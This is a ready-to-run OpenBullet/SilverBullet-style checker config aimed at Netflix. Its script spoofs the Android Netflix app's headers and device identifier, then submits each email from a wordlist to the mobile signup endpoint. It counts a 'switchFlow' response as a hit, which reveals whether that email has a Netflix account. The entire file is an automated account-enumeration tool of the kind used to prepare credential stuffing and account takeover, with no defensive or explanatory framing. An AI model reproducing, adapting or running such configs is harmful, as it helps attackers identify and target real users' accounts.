[SETTINGS]
{
  "Name": "Netflix",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-08-26T12:47:00.1797901+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Aneek",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Netflix",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/" 
  
  HEADER "Host: android.prod.cloud.netflix.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: com.netflix.mediaclient/50788 (Linux; U; Android 14; en_US; Pixel 8 Pro; Build/AP1A.240405.002; Cronet/113.0.5672.61)" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d" -> VAR "d" 

FUNCTION GenerateGUID -> VAR "1" 

FUNCTION Replace "-" "" "<1>" -> VAR "2" 

PARSE "<SOURCE>" LR "\"authURL\":\"" "\"" -> VAR "au" 

FUNCTION Unescape "<au>" -> VAR "AU" 

FUNCTION URLEncode "<AU>" -> VAR "auth" 

PARSE "<SOURCE>" LR "\"esn\":\"" "\"" -> VAR "esn" 

FUNCTION URLEncode "<COOKIES(NetflixId)>" -> VAR "NetflixId" 

FUNCTION URLEncode "<COOKIES(SecureNetflixId)>" -> VAR "SecureNetflixId" 

FUNCTION Constant "<COOKIES(flwssn)>" -> VAR "flwssn" 

REQUEST POST "https://android.prod.cloud.netflix.com/nq/aui/endpoint/%5E1.0.0-mobile/pathEvaluator?method=call&callPath=%5B%22aui%22%2C+%22moneyball%22%2C+%22next%22%5D&callPath=%5B%22aui%22%2C+%22requestContext%22%5D&responseFormat=json&devmod=Google_Pixel%208%20Pro&appVer=50788&appVersion=8.127.1&appType=samurai&installType=regular&isNetflixPreloaded=false&netflixClientPlatform=androidNative&nglVersion=NGL_LATEST_RELEASE&landingOrigin=https://www.netflix.com&isConsumptionOnly=true&inApp=true&languages=en&availableLocales=en-US&original_path=/aui/pathEvaluator/mobile/latest&flow=mobileSignup&mode=welcome&TAG=AUI" 
  CONTENT "authURL=<auth>&allocations=%7B%2263044%22%3A5%7D&flwssn=<flwssn>&secureNetflixId=<SecureNetflixIdA>&param=%7B%22mode%22%3A%22welcome%22%2C%22action%22%3A%22saveAction%22%2C%22fields%22%3A%7B%22email%22%3A%7B%22value%22%3A%22<USER>%22%7D%7D%2C%22flow%22%3A%22mobileSignup%22%7D&installType=regular&netflixId=<NetflixId>&" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme : https" 
  HEADER "content-length: 900" 
  HEADER "x-netflix.appver: 8.127.1" 
  HEADER "x-netflix.clienttype: samurai" 
  HEADER "x-netflix.esnprefix: NFANDROID1-PRV-P-" 
  HEADER "x-netflix.androidapi: 34" 
  HEADER "x-netflix.esn: NFANDROID1-PXA-P-GOOGLPIXEL=8=PRO-22748-0202DPT0GISDNC6GU1K146A0I8M6GBFRDO07OEIEICIMC7LB8NBQOVUFJNKBO303OKFHHD3277J65DL9RRR8G0KO9GRVGDM6PND03D20" 
  HEADER "x-netflix.deviceformfactor: PHONE" 
  HEADER "x-netflix.request.attempt: 1" 
  HEADER "x-netflix.devicememorylevel: HIGH" 
  HEADER "x-netflix.session.id: <d>" 
  HEADER "x-netflix.request.id: <2>" 
  HEADER "x-netflix.zuul.brotli.allowed: true" 
  HEADER "x-netflix.request.uuid: <1>" 
  HEADER "user-agent: com.netflix.mediaclient/50788 (Linux; U; Android 14; en_US; Pixel 8 Pro; Build/AP1A.240405.002; Cronet/113.0.5672.61)" 
  HEADER "accept-encoding: gzip, deflate, br" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"mode\":\"switchFlow" 
  KEYCHAIN Failure OR 
    KEY "\"mode\":\"registration\"" 
    KEY "\"mode\":\"welcome" 

FUNCTION Constant "https://github.com/aneekirfan" -> CAP "Config By" 

